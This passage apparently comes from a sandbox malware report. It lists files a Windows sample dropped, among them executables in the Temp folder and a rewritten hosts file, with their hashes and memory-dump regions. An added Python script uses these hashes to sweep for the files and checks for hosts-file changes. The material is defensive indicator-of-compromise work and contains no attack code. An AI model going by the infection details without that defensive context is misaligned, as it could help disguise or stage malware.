  SHA512: de63836a6d85c0efca840ef4351f668649a28753f1e0524eb5d5578c8da81e4aec57502f3870a9fd4befe8453d6443f230bce8c84be4d45d50733f40ece52c62

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DFD.tmp.csv
  Filesize: 38KB
  MD5: 7b52d187d29de1df11b661db92639b8c
  SHA1: a9e6310058f5c84020498958154c7c71bdfeda6a
  SHA256: 87e19fd9e4726dcb934b94b75022b08836b193eeb4e89e647c1cb991a799ccef
  SHA512: aa662496089546269bb812642c5e41cf6962b950cd49aff99d7de5afc8db809c487a319a95247b2379407933d118305f59b808ba409643f198ba44d43e31e3f6

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER6E6C.tmp.txt
  Filesize: 13KB
  MD5: f8763dc37112f78496d4078309d35924
  SHA1: e6b13f7ec04a376f3e5ee241cf4609a020823dcd
  SHA256: 4cf47508a1cc4eb121264e949391b754b022ecd0811c77ae9c2d42fdf1a038cf
  SHA512: 384a498ded0229662ae1cbcff708f79f6b5224ca36a57327804c6872f2def503e7f7c8ca6386e494663bcd355f56f5d27b9d4738f2d4db7f4f841c14f4326162

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER889C.tmp.csv
  Filesize: 35KB
  MD5: b71137a9aa7dae34c6268190beb9a88b
  SHA1: fce221e47c32c670a8956d2a30475b37051bff81
  SHA256: 753bec6011ee9d96734cab83a650a824fb9651800db9f2fbd0de74762c9c6ba1
  SHA512: 7a480c7f8d69d7229b4eb6cb4456f959150c7ea1c89eb1adfde9a2d038f8886d28945da2777cea68d449264b23bd748994429dfaefac046ee75b33715b01213d

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER88DB.tmp.txt
  Filesize: 13KB
  MD5: 16457ddba7b2360a4c5888d3a66dd4a4
  SHA1: 4577d783c5beaed4d15ce2d6c237f9c309c492fb
  SHA256: 28d983615c9f29b6627b5f0208bbb257f1a2ead0066e38331e4e57648e5f62a1
  SHA512: 689d77b2dcbc219f4c0e995b5697f169cc3bb2c51f6f68756a7b2c43e4d705722886fd551a892e0e56029c1f7faed006886c05363a9c6175993c00e2fe641d8d

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER903F.tmp.csv
  Filesize: 35KB
  MD5: 5bb8b5ea2a17b25b70043ac2d2f83853
  SHA1: f887574f104d45a22e6a3958134e3d4647f4c7cb
  SHA256: 5dd7ac57e4e8458fa578d33cf1a95058be796dd144f5418f92b834083002cc7b
  SHA512: 48eaa8fdff88132035652602c68c79debe1a99f18eefc3507e870ca7ea0207c74415783725107d2172757d93048fada6c7f3f04fdad9eb97183e2bc61d983976

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER906F.tmp.txt
  Filesize: 13KB
  MD5: eae9799445b5d35f6a95816bf899c0df
  SHA1: 9189507ad87c9eac4a215f62e57b429d3960cd66
  SHA256: 0e101de44b8b684e436ce067e0ebba7c4f727f13bc8923018cfb484378391105
  SHA512: 314900754fec3c1537884d4fab05641d1ea64320fd28b76207eaf2ecd0e60a652a470d183f53f61843ab00e2370f3c23b096bfaebdbb60811ccf9525266ffd8b

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER97A4.tmp.csv
  Filesize: 35KB
  MD5: 69d4e338778eee6224cee4ddaf1608ab
  SHA1: bc343f9c87acf1b18ab7dfce2701db5f719d870e
  SHA256: 896e9e277da2f54c44d0e14ffe7ea3f07e0944ec89617f2e82b883e99813cad6
  SHA512: 25d2778cd643ae2dafebebd611a4bee4e2d611fc102039af547001a664aa9316f53187b9d14f18d3cbad63d9c22a94382f5daa2f5c25995b056b493aa98faad4

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER97F3.tmp.txt
  Filesize: 13KB
  MD5: 326db9c91eac2505ed9589a3ae33c79e
  SHA1: 01cab51f8318f4201b0e88200d52e211d00e025e
  SHA256: d32acaae676db5ea896e52efb27cc2724a0347d57f077bf83c45fcc5b2854817
  SHA512: 5648a2877e921ec6ffb3ecbbbe2594e73b34a5b7dc4313e8c904b1ea01a641f050d4f2b80cdc41d903d0ec8f7af4f0d6f661cf3bd6bf1ea0a3d59915534d0063

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F66.tmp.csv
  Filesize: 35KB
  MD5: 39e5f596dca1ad8e6d40649e5f6d6597
  SHA1: 6478804601c1e2921f169d720c6728c014e9c46b
  SHA256: 9a1c74261f2d2b0bee3ff184f93de627707861f4643419363c74b61b76c25060
  SHA512: 1d126ebf407d9b615db8fde76c52ea8b88ceed71e26d10c87045b571aa5e4e2a4b9c35f341fdf481988f80d46641d0bd1f9e08606b3dfa96741505829fc81437

- C:\ProgramData\Microsoft\Windows\WER\Temp\WER9F96.tmp.txt
  Filesize: 13KB
  MD5: 4feb255b6696e750f57df015396359d1
  SHA1: c20c4445fc5a4caec0a94437149c8ba0be975924
  SHA256: 99a6cd19b042a356af6005b8aff38bdcb6d4dac8a763574c0c2353f29ad7954e
  SHA512: a7215da614878f53311b6078955e6999595535f54f1dc270aef5b967304478210a38e52377d696bec70a6b22ab50f1725f531463bd0da75863a4dba0c12df91d

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4B7.tmp.csv
  Filesize: 35KB
  MD5: 4185777da7c417ed03ceb5bf8d39ef56
  SHA1: c12a5bac28d7c3bc45b8cf57a2b1fbbf35e67f12
  SHA256: 6b38d993da61fdef619068ab20e0aad4484c3cdbde8fc29cba2d7fb54911ed18
  SHA512: d8147149694474600c57ee29c565542659d33e108ffe9e1e40e8f3862c0360684e5145111e6a8732da1bff00ab94f57ecf0f7c5e1df5c2952583d82818d949e2

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERA535.tmp.txt
  Filesize: 13KB
  MD5: c0ffc0b8b12ad711e764bb801c50cf58
  SHA1: 0c7be709113690b6cef23a387c9499ba032828e8
  SHA256: d03886bd172937a573d1fabb55a729d57e487c7c7d667bbf64d35ed286c43d4e
  SHA512: 1f851b5298655350b897e324d6282967fcd108b57ab80cbae9446919989e57288543bf8601cb07e161f87501622bf13a11a1732de8c51ff268ee9d3c6bdb8dbe

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF68.tmp.csv
  Filesize: 35KB
  MD5: 90a8bf80178a5bf5b8028c2bc68253b0
  SHA1: eeeca6078290e5f5b66d705bbd50df4c2478a551
  SHA256: 07d5afa3cd14ecbb53c265ca56452fba4786cc3977a97193105f89aef5dd5e04
  SHA512: c4d9046d5a733c6b70be4c7e3243ca1bc0f8b94ebaee1710168a3c3055dfb8d0608b76c084ff29ffd62480b385786c7dba666b0196da0ad36754a989e595030f

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFA7.tmp.txt
  Filesize: 13KB
  MD5: c1a8fa3e3caf143a4e89d105aa9e06e1
  SHA1: fd6105a1790b285be7535f5a81b79ea1a518cd4e
  SHA256: da5be99169376ac62e329ea67cd2c1fb8f1b7d5bce625fc9def74974154cb375
  SHA512: 43c528ae8f8eaeadbcabe682c47a61a251f6fa5c969feabb830de27f917f4c81c206afe40fc1d131eb84f3f05fa5708ddc0249a4a95e285949fac45a84eb0021

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERB620.tmp.csv
  Filesize: 35KB
  MD5: 0904024a228c475828edc51d71134e12
  SHA1: 0fcf08442d077f6af0a6b6d77b9a2d561d1c1f46
  SHA256: 2811c55dbfad013ddfe62126fc0d3f8b2b734fe586f82f8efa654b395d11600b
  SHA512: 9f80c07e149b468aa27d9cb066734404d9e46ab6747b8da69311521a4d86d9f3ebd93cad3b3236bd4a3da34f852a64287a80c0a23370cd9377764c9d8696902a

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERB67F.tmp.txt
  Filesize: 13KB
  MD5: d677e5fa7885830241752bcb36924b06
  SHA1: af8f3a968208a72c1ede3420a95e43d035e5952a
  SHA256: fda31a377f81d009217126e923fc7e656239ca60e51bc6da82bddc24113a2c21
  SHA512: 5876e07f5cb5a501dd8b393ea504196eb852a1ef49770604eb83fdf936944769fd829883bfd24e7ce7bebb35d7ef3201737d840471f5e96020b45c8f5a1c644f

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD18.tmp.csv
  Filesize: 35KB
  MD5: 98cec8b8acd64795d713e12b1ce12e8d
  SHA1: e719ea30bf173b29396ffd757abe1cc1ead23145
  SHA256: 3cdbbf1193dcf2848fc9601e1eade0d74c68e75210ca085079b95cf8b2851ebc
  SHA512: 9c265b1389e3592bc033cf6833b0267e8d3b7071f5ebb42832becc3da9195d16360cfe42dc2c775036fb032823f5a58e209a3fd3a5bef0422666c269ca57b999

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD76.tmp.txt
  Filesize: 13KB
  MD5: 0b4b7166a4fa9b62970c4eabd71aa962
  SHA1: d344171e1b7049bbbdc6189d3948f235ff05fb37
  SHA256: 0663a195dfbba139c73bd9227ff16ebfef5eae6e145ccfb138348357fb37c77d
  SHA512: 99f41edf0f9271343a42531ef76a406f3ed544631c2fe75d405847e88b21a8a6c95d53c90ad431a07a24a17460bff9ae63af958c6759d1eb49ac77927521f32a

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERC43E.tmp.csv
  Filesize: 35KB
  MD5: 9f2c766cdbb9aafe4de37cdad47d2de1
  SHA1: d06a79f04f84832449c58b3da3d072e7e88eea34
  SHA256: a953001bddaee64067d4c2668eab5e92306166f623beb2df3c525b9b7317eddd
  SHA512: e9f2c826a0f5a84a20ef4f7c75a8ba363565974844f15a2a17f0e0473b2ebdff2a149397eccddb44c703267ae62090124cb741d4933c097da891d934346a2868

- C:\ProgramData\Microsoft\Windows\WER\Temp\WERC48D.tmp.txt
  Filesize: 13KB
  MD5: 4fc4ca963a1ebe67323faca08b2e8d8b
  SHA1: 824f7b8663f66ce24aef19cc8397ec467d9ff015
  SHA256: fd4c63e9ba1742548ec52ac9229d556ddbea01362fd67bada21e11a7372645d2
  SHA512: f6bc30c48ff4ad906a188f4699fad8c3bab39d676917f7181c699631d6466ae3d89f75c0d305060e9e5949b74985d540a560e9a9a2f610472f6eb4b1ed49d391

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: d85ba6ff808d9e5444a4b369f5bc2730
  SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
  SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
  SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 19KB
  MD5: a52bfac7c3f992de8d884ca6f4498777
  SHA1: 0d98c788f2973153c0d1d2553bee7760d1dadcb5
  SHA256: cf296b268819485427f4310a31c9ebfc09e75e211989f7833246db0ad57cf657
  SHA512: 7c335a49c7b6248fe6526a5e0cd093d903157e18e63382593285bb8bf2ac1f11e49d4a46b60af222aecbc09931bbf6c65d3a38283873394294f090d54903cda9

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 948B
  MD5: a7ce8cefc3f798abe5abd683d0ef26dd
  SHA1: b7abb625174a48db3221bf0fee4ecdbc2bd4ee1e
  SHA256: 5e97dee013313bedacd578551a15e88ed87b381ed8f20755cb929b6358fd020a
  SHA512: c0d1821252d56e7b7d5b5d83891673f279f67638da1f454fb45e0426315cf07cc54c6df2cf77c65c11bcb3a1e4f574f76a3fb9059fde94951ba99d3de0e98d64

- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: d0f3eff52698c0eab8a2c8bd1d9f7c18
  SHA1: 4292ae775443749c6c2281dac800d86b4bdde07e
  SHA256: b16c74cbb71b5ba7bbf32696feb6869d9a0fa3bac42042a3fe8f3d48e2d5dbf6
  SHA512: 642b5d51a4cec6094e6789f29eb68885068583a08e102606b7ed2ace036cacd8b3bc428cef6f8cbfaadf5644fe52149211f7fc6774fc4ff458bd76cfae703cfd

- C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
  Filesize: 2.7MB
  MD5: 43a0526a928f9daca9c953221406af8e
  SHA1: 34fdd0d94ecfe8c887ebb164068579013d2c611b
  SHA256: 88e1fbd4e5494e3c2766300e8bab97edb08f3c7315c3d914b7d8b2dac25f8986
  SHA512: 9632a96172d6db2d7b0e356a2bb661b397b3c8b380fbe151707322d204cee0ab82abbec4476ce6e43f5dfa67b9ae34d77909fbc966d431898b25dec9fbaea3fd

- C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
  Filesize: 3.7MB
  MD5: e2fb72e358e13e40ae8327c3a9df8165
  SHA1: b40aceed9393e3d4c289b2cf477dd5dee76a39da
  SHA256: d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
  SHA512: b209805a5194ccf70a97a57685a1765bb1ef15480994a2737084805fa21f79a285a5a1f98d0857051bc03ad98a2c90d81b33bb49cde1e955ba9898e86d8697e9

- C:\Users\Admin\AppData\Local\Temp\SysApp.exe
  Filesize: 1.4MB
  MD5: b6bbab9f72c88d07b484cc339c475e75
  SHA1: f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
  SHA256: dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
  SHA512: 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5

- C:\Users\Admin\AppData\Local\Temp\new2.exe
  Filesize: 674KB
  MD5: 25efca5920d6608517e68c85a932ed7f
  SHA1: 04421b033c3ba1fed354e2a36503d8b192083979
  SHA256: a6ab90d5445d7ff822f3d9401ab6c438e624d416575d68be8eb4336f3c41c9dd
  SHA512: 917d0ec98166454eb13d3e40a8ff6c2fc0f0a793896663b8905828162e42d821eebd38ac520429f0e3bec58df1cfb287a28545983437b1405b6721e048f5ddec

- C:\Windows\System32\drivers\etc\hosts
  Filesize: 2KB
  MD5: 4ac8a26e2cee1347880edccb47ab30ea
  SHA1: a629f6d453014c9dccb98987e1f4b0a3d4bdd460
  SHA256: de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
  SHA512: fc2af80b2e84ae114ae06144b9ec41eed50250e20f18db3d114ac8d2c59ebbfcd440f59d12f173ea6a94bcf394b0cecee9e120265112b7043bf9e2bd636d6a8a

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 4KB
  MD5: bdb25c22d14ec917e30faf353826c5de
  SHA1: 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
  SHA256: e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
  SHA512: b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: b42c70c1dbf0d1d477ec86902db9e986
  SHA1: 1d1c0a670748b3d10bee8272e5d67a4fabefd31f
  SHA256: 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
  SHA512: 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: aa187cac09f051e24146ad549a0f08a6
  SHA1: 2ef7fae3652bb838766627fa6584a6e3b5e74ff3
  SHA256: 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
  SHA512: 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2
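The dropped-file list above is a set of indicators of compromise. The following Python is an added example, not part of the Triage report and not code from the sample's author: it parses entries in the report's own layout, sweeps a directory tree by SHA-256 so a renamed copy of the same payload is still found (the list already shows SmartScreenQC.exe and SmartDefRun.exe sharing one hash), and lists active hosts-file mappings, since a 2KB hosts file appears among the written files and the stock Windows hosts file has every mapping commented out. SAMPLE_REPORT, SAMPLE_HOSTS and the stand-in file planted by self_check() are constructed inputs; the hostname telemetry.example.invalid is made up.

```python
"""IOC sweep built from a sandbox report's dropped-file list (added example)."""
import hashlib
import os
import re
import tempfile
from dataclasses import dataclass, field

# Constructed sample: three entries copied from the report's Downloads list in
# the page's raw layout ("<path>Filesize", "<size>", "MD5<hex>", ...).
SAMPLE_REPORT = """\
-
C:\\Program Files\\WindowsDefenderQC\\Defender\\SmartScreenQC.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
-
C:\\Users\\Admin\\AppData\\Local\\Temp\\SmartDefRun.exeFilesize
3.7MB
MD5e2fb72e358e13e40ae8327c3a9df8165
SHA1b40aceed9393e3d4c289b2cf477dd5dee76a39da
SHA256d6516a119c2c08859883d95f97b0bd4b2fb8fbad7d7fae6ed2d79b447177d408
-
C:\\Windows\\System32\\drivers\\etc\\hostsFilesize
2KB
MD54ac8a26e2cee1347880edccb47ab30ea
SHA1a629f6d453014c9dccb98987e1f4b0a3d4bdd460
SHA256de574c85b289f23bba4b932a4c48397c4c61904cb6df086726dd7f8049624c3a
"""

# Constructed hosts file: the stock (commented-out) Windows lines plus one
# active mapping of the kind a hosts-file rewrite adds. Hostname is invented.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#\t127.0.0.1       localhost
#\t::1             localhost
127.0.0.1 telemetry.example.invalid
"""

# Accept both the fused raw layout ("MD5<hex>") and a labelled one ("MD5: <hex>").
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512):?\s*([0-9a-fA-F]+)$")
SIZE_RE = re.compile(r"^(?:Filesize:?\s*)?(\d+(?:\.\d+)?[KMG]?B)$")
STOCK_LOCALHOST = {("127.0.0.1", "localhost"), ("::1", "localhost")}


@dataclass
class DroppedFile:
    path: str
    size: str = ""
    hashes: dict = field(default_factory=dict)


def parse_dropped_files(text):
    """Parse a report's Downloads list into DroppedFile records."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":          # blank lines and list markers
            continue
        m = HASH_RE.match(line)
        if m and cur is not None:
            cur.hashes[m.group(1)] = m.group(2).lower()
        elif SIZE_RE.match(line) and cur is not None:
            cur.size = SIZE_RE.match(line).group(1)
        else:                                # anything else starts a new entry
            path = line[2:] if line.startswith("- ") else line
            if path.endswith("Filesize"):    # label fused onto the path
                path = path[:-len("Filesize")]
            cur = DroppedFile(path=path)
            records.append(cur)
    return records


def sha256_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def sweep(root, records):
    """Hash every file under root; return (found_path, reported_path) pairs
    whose SHA-256 matches a dropped file. Matching on content, not on path,
    catches the same payload staged under another name."""
    wanted = {}
    for r in records:
        if "SHA256" in r.hashes:
            wanted.setdefault(r.hashes["SHA256"], []).append(r.path)
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                digest = sha256_file(full)
            except OSError:                  # unreadable or vanished: keep going
                continue
            hits.extend((full, reported) for reported in wanted.get(digest, []))
    return hits


def active_hosts_entries(hosts_text):
    """(ip, name) mappings actually in effect, ignoring comments and the stock
    localhost lines; on an untouched Windows install this is empty."""
    found = []
    for raw in hosts_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        found.extend((ip, n) for n in names if (ip, n.lower()) not in STOCK_LOCALHOST)
    return found


def self_check():
    """Offline run: plant a constructed stand-in, build an IOC record from its
    real digest and confirm the sweep reports it under the reported path."""
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "sub", "SmartDefRun.exe")
        os.makedirs(os.path.dirname(planted))
        with open(planted, "wb") as f:
            f.write(b"constructed stand-in, not the sample\n")
        ioc = DroppedFile(path=r"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe",
                          hashes={"SHA256": sha256_file(planted)})
        return sweep(tmp, [ioc])


if __name__ == "__main__":
    for rec in parse_dropped_files(SAMPLE_REPORT):
        print(rec.size.rjust(6), rec.hashes.get("SHA256"), rec.path)
    print("hosts:", active_hosts_entries(SAMPLE_HOSTS))
    print("sweep:", self_check())
```

On a real host, point sweep() at the staging directories the report names (the user's Temp folder, C:\Program Files\WindowsDefenderQC) rather than the whole volume, and read the hosts file from C:\Windows\System32\drivers\etc\hosts into active_hosts_entries(); the SHA-256 comparison is the one to trust, since the MD5 and SHA-1 values are carried only for cross-referencing other reports.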
- memory/344-265-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmp (2.0MB)
- memory/344-253-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/344-214-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/344-258-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmp (760KB)
- memory/344-257-0x00007FFA11CD0000-0x00007FFA11EC5000-memory.dmp (2.0MB)
- memory/344-266-0x00007FFA104F0000-0x00007FFA105AE000-memory.dmp (760KB)
- memory/424-276-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/428-275-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/576-269-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/656-270-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/760-242-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/760-241-0x0000022DAE5F9000-0x0000022DAE5FF000-memory.dmp (24KB)
- memory/760-243-0x0000022DAE5F9000-0x0000022DAE5FF000-memory.dmp (24KB)
- memory/760-234-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/856-232-0x0000000000000000-mapping.dmp
- memory/904-221-0x000001B03AEB0000-0x000001B03AEB6000-memory.dmp (24KB)
- memory/904-222-0x000001B03AEC0000-0x000001B03AECA000-memory.dmp (40KB)
- memory/904-223-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/904-220-0x000001B039E80000-0x000001B039E88000-memory.dmp (32KB)
- memory/904-219-0x000001B03AED0000-0x000001B03AEEA000-memory.dmp (104KB)
- memory/904-218-0x000001B039E70000-0x000001B039E7A000-memory.dmp (40KB)
- memory/904-217-0x000001B039E90000-0x000001B039EAC000-memory.dmp (112KB)
- memory/904-216-0x000001B039E60000-0x000001B039E6A000-memory.dmp (40KB)
- memory/904-215-0x000001B039E40000-0x000001B039E5C000-memory.dmp (112KB)
- memory/904-213-0x00007FF9F2FF0000-0x00007FF9F3AB1000-memory.dmp (10.8MB)
- memory/940-277-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/944-274-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/952-490-0x0000000000000000-mapping.dmp
- memory/1008-278-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1020-271-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1112-279-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1180-280-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1252-281-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1316-282-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1336-283-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1376-284-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1392-285-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1492-230-0x0000000000000000-mapping.dmp
- memory/1496-286-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1520-331-0x0000000000000000-mapping.dmp
- memory/1552-287-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1560-288-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1624-289-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1636-290-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1648-514-0x0000000000000000-mapping.dmp
- memory/1652-427-0x0000000000000000-mapping.dmp
- memory/1700-291-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1732-298-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1764-447-0x0000000000000000-mapping.dmp
- memory/1788-292-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1820-293-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1836-457-0x0000000000000000-mapping.dmp
- memory/1912-294-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1920-295-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/1972-533-0x0000000000000000-mapping.dmp
- memory/1980-236-0x0000000000000000-mapping.dmp
- memory/1988-185-0x0000000000000000-mapping.dmp
- memory/2004-296-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2012-297-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2032-171-0x0000000000000000-mapping.dmp
- memory/2040-192-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmp (10.8MB)
- memory/2040-181-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmp (10.8MB)
- memory/2108-187-0x0000000000000000-mapping.dmp
- memory/2112-299-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2136-465-0x0000000000000000-mapping.dmp
- memory/2212-165-0x00000000000A0000-0x0000000000354000-memory.dmp (2.7MB)
- memory/2212-170-0x0000000004CE0000-0x0000000004D72000-memory.dmp (584KB)
- memory/2212-207-0x00000000074B0000-0x00000000074EC000-memory.dmp (240KB)
- memory/2212-173-0x0000000005030000-0x000000000503A000-memory.dmp (40KB)
- memory/2212-160-0x0000000000000000-mapping.dmp
- memory/2236-300-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2272-176-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmp (10.8MB)
- memory/2272-177-0x00007FF9F2ED0000-0x00007FF9F3991000-memory.dmp (10.8MB)
- memory/2272-174-0x000001CDDEEA0000-0x000001CDDEEC2000-memory.dmp (136KB)
- memory/2376-301-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2392-302-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2436-194-0x00007FF7FBDE1938-mapping.dmp
- memory/2440-443-0x0000000000000000-mapping.dmp
- memory/2484-303-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2508-304-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2516-306-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2672-305-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2680-307-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2736-308-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2752-309-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2764-310-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2776-311-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/2892-510-0x0000000000000000-mapping.dmp
- memory/2896-235-0x0000000000000000-mapping.dmp
- memory/2928-536-0x0000000000000000-mapping.dmp
- memory/3060-272-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/3080-312-0x00007FF9D1D50000-0x00007FF9D1D60000-memory.dmp (64KB)
- memory/3116-504-0x0000000000000000-mapping.dmp
- memory/3164-539-0x0000000000000000-mapping.dmp
- memory/3196-237-0x0000000000000000-mapping.dmp
- memory/3208-179-0x0000000000000000-mapping.dmp
- memory/3212-229-0x0000000000000000-mapping.dmp
- memory/3276-471-0x0000000000000000-mapping.dmp
- memory/3284-481-0x0000000000000000-mapping.dmp
- memory/3444-203-0x0000000002789000-0x00000000028C6000-memory.dmp (1.2MB)
- memory/3444-166-0x0000000000000000-mapping.dmp
- memory/3444-178-0x0000000002278000-0x000000000277C000-memory.dmp (5.0MB)
- memory/3444-240-0x0000000002789000-0x00000000028C6000-memory.dmp (1.2MB)
- memory/3444-212-0x0000000002278000-0x000000000277C000-memory.dmp (5.0MB)
- memory/3500-526-0x0000000000000000-mapping.dmp
